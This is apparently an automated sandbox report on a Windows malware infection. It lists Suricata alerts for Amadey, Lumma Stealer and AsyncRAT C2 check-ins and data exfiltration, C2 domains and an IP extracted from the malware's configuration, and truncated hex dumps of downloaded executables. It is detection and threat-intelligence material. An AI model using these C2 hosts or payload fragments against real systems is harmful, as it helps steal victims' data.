Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50059 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT Style SSL Cert : 191.101.130.246:56001 -> 192.168.2.4:50060
Source: Network traffic	Suricata IDS: 2058638 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click) : 192.168.2.4:53046 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50063 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2856097 - Severity 1 - ETPRO MALWARE Win32/Unknown Bot CnC Activity (M2) : 192.168.2.4:50030 -> 185.163.204.98:80
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50065 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50066 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2800029 - Severity 1 - ETPRO EXPLOIT Multiple Vendor Malformed ZIP Archive Antivirus Detection Bypass : 31.41.244.11:80 -> 192.168.2.4:50061
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50068 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50069 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50070 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50073 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:50072 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50062 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:50075 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.4:50064 -> 185.163.204.98:80
Source: Network traffic	Suricata IDS: 2858666 - Severity 1 - ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup : 192.168.2.4:50021 -> 104.102.49.254:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50023 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50023 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50025 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50025 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50034 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50034 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50036 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50035 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50043 -> 104.21.96.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50045 -> 188.114.97.3:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:50066 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:50062 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50062 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:50063 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50063 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50075 -> 172.67.132.7:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:50058 -> 188.114.97.3:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: wholersorie.shop
Source: Malware configuration extractor	URLs: noisycuttej.shop
Source: Malware configuration extractor	URLs: cureprouderio.click
Source: Malware configuration extractor	URLs: tirepublicerj.shop
Source: Malware configuration extractor	URLs: abruptyopsn.shop
Source: Malware configuration extractor	URLs: rabidcowse.shop
Source: Malware configuration extractor	URLs: nearycrepso.shop
Source: Malware configuration extractor	URLs: framekgirus.shop
Source: Malware configuration extractor	URLs: cloudewahsj.shop
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:08:07 GMTContent-Type: application/octet-streamContent-Length: 93696Last-Modified: Tue, 07 Jan 2025 03:25:56 GMTConnection: keep-aliveETag: "677c9ec4-16e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 5d 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 14 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 62 d9 00 00 00 50 00 00 00 da 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a5 33 00 00 00 30 01 00 00 34 00 00 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 5e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:08:18 GMTContent-Type: application/octet-streamContent-Length: 3231232Last-Modified: Tue, 07 Jan 2025 09:07:07 GMTConnection: keep-aliveETag: "677ceebb-314e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 9a 01 00 00 00 00 00 00 50 31 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 31 00 00 04 00 00 a5 2b 32 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 d4 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 38 31 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 90 38 31 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 80 06 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 d4 05 00 00 00 90 06 00 00 04 00 00 00 90 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 94 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 75 62 75 62 76 77 61 75 00 90 2a 00 00 b0 06 00 00 90 2a 00 00 96 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 67 6a 6d 76 6e 65 69 62 00 10 00 00 00 40 31 00 00 06 00 00 00 26 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 50 31 00 00 22 00 00 00 2c 31 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:08:59 GMTContent-Type: application/octet-streamContent-Length: 9578331Last-Modified: Mon, 06 Jan 2025 11:29:34 GMTConnection: keep-aliveETag: "677bbe9e-92275b"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 5b 46 0e 24 1f 27 60 77 1f 27 60 77 1f 27 60 77 bd e0 b3 77 1e 27 60 77 ee e1 ad 77 05 27 60 77 88 79 64 76 1e 27 60 77 ee e1 ae 77 9a 27 60 77 bd e0 ae 77 1e 27 60 77 ee e1 af 77 5f 27 60 77 e3 50 dc 77 1b 27 60 77 1f 27 61 77 d5 26 60 77 e3 50 d9 77 08 27 60 77 bd e0 af 77 32 27 60 77 bd e0 a9 77 1e 27 60 77 1f 27 f7 77 1e 27 60 77 bd e0 ac 77 1e 27 60 77 52 69 63 68 1f 27 60 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 50 ef 2c 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 b2 06 00 00 dc 07 00 00 00 00 00 c7 36 04 00 00 10 00 00 00 d0 06 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 f0 0e 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 46 08 00 f0 00 00 00 00 c0 08 00 74 99 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 0d 00 b8 6a 00 00 40 d6 06 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 90 07 00 40 00 00 00 00 00 00 00 00 00 00 00 00 d0 06 00 b8 05 00 00 b0 42 08 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9f b0 06 00 00 10 00 00 00 b2 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 54 95 01 00 00 d0 06 00 00 96 01 00 00 b6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 58 49 00 00 00 70 08 00 00 24 00 00 00 4c 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 74 99 04 00 00 c0 08 00 00 9a 04 00 00 70 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 14 86 01 00 00 60 0d 00 00 88 01 00 00 0a 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:13 GMTContent-Type: application/octet-streamContent-Length: 366592Last-Modified: Tue, 07 Jan 2025 05:43:16 GMTConnection: keep-aliveETag: "677cbef4-59800"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 db 35 e6 fd 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 86 00 00 00 06 00 00 00 00 00 00 ae a4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 20 06 00 00 04 00 00 50 c7 05 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 a4 00 00 4b 00 00 00 00 c0 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 16 a4 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 84 00 00 00 20 00 00 00 86 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 00 00 00 04 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 08 05 00 00 00 01 00 00 08 05 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:17 GMTContent-Type: application/octet-streamContent-Length: 439296Last-Modified: Mon, 06 Jan 2025 12:08:44 GMTConnection: keep-aliveETag: "677bc7cc-6b400"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 dd b6 42 53 99 d7 2c 00 99 d7 2c 00 99 d7 2c 00 8d bc 2f 01 94 d7 2c 00 8d bc 29 01 23 d7 2c 00 cb a2 28 01 8b d7 2c 00 cb a2 2f 01 8f d7 2c 00 cb a2 29 01 c0 d7 2c 00 a8 8b d1 00 9b d7 2c 00 8d bc 28 01 8e d7 2c 00 8d bc 2d 01 8a d7 2c 00 99 d7 2d 00 6a d7 2c 00 55 a2 25 01 98 d7 2c 00 55 a2 d3 00 98 d7 2c 00 55 a2 2e 01 98 d7 2c 00 52 69 63 68 99 d7 2c 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 09 55 68 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 1d 00 f2 04 00 00 00 02 00 00 00 00 00 27 a0 02 00 00 10 00 00 00 10 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 30 07 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 80 45 06 00 c8 00 00 00 00 d0 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 06 00 c0 45 00 00 d8 e1 05 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e3 05 00 18 00 00 00 10 e2 05 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 05 00 3c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 6a f1 04 00 00 10 00 00 00 f2 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 90 48 01 00 00 10 05 00 00 4a 01 00 00 f6 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 dc 6d 00 00 00 60 06 00 00 2c 00 00 00 40 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 d0 06 00 00 02 00 00 00 6c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c0 45 00 00 00 e0 06 00 00 46 00 00 00 6e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Tue, 07 Jan 2025 09:09:21 GMTContent-Type: application/octet-streamContent-Length: 360448Last-Modified: Tue, 07 Jan 2025 02:11:30 GMTConnection: keep-aliveETag: "677c8d52-58000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 db 35 e6 fd 00 00 00 00 00 00 00 00 e0 00 2e 01 0b 01 30 00 00 86 00 00 00 06 00 00 00 00 00 00 ae a4 00 00 00 20 00 00 00 c0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 04 00 00 f1 40 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 a4 00 00 4b 00 00 00 00 c0 00 00 42 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 00 00 0c 00 00 00 16 a4 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 b4 84 00 00 00 20 00 00 00 86 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 42 02 00 00 00 c0 00 00 00 04 00 00 00 8a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 e0 00 00 00 02 00 00 00 8e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 62 73 73 00 00 00 00 00 f0 04 00 00 00 01 00 00 f0 04 00 00 90 00 00 00 00 00 00 